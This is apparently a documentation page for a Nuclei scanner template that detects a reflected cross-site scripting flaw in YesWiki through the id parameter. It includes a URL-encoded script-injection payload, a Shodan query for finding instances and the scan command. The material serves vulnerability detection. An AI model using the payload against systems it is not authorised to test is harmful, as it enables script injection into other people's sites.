YesWiki <2022-07-07 - Cross-Site Scripting
ID: yeswiki-xss
Severity: medium
Author: arafatansari
Tags: yeswiki,huntr,xss
Description
Section titled “Description”YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.
YAML Source
Section titled “YAML Source”id: yeswiki-xss
info: name: YesWiki <2022-07-07 - Cross-Site Scripting author: arafatansari severity: medium description: | YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL. reference: - https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cwe-id: CWE-79 cpe: cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"yeswiki" product: yeswiki vendor: yeswiki tags: yeswiki,huntr,xss
http: - method: GET path: - '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and matchers: - type: word part: body words: - "<script>alert(document.domain)</script>" - "Query failed:" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502201b691f4af3a71a2a08b6b64678cc71995eea894dea8a695f827b56a383a7e20e02210082b537d12c79d07cb3aca20439203161b81a1666961cbab361bb0c7152a77471:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/yeswiki-xss.yaml"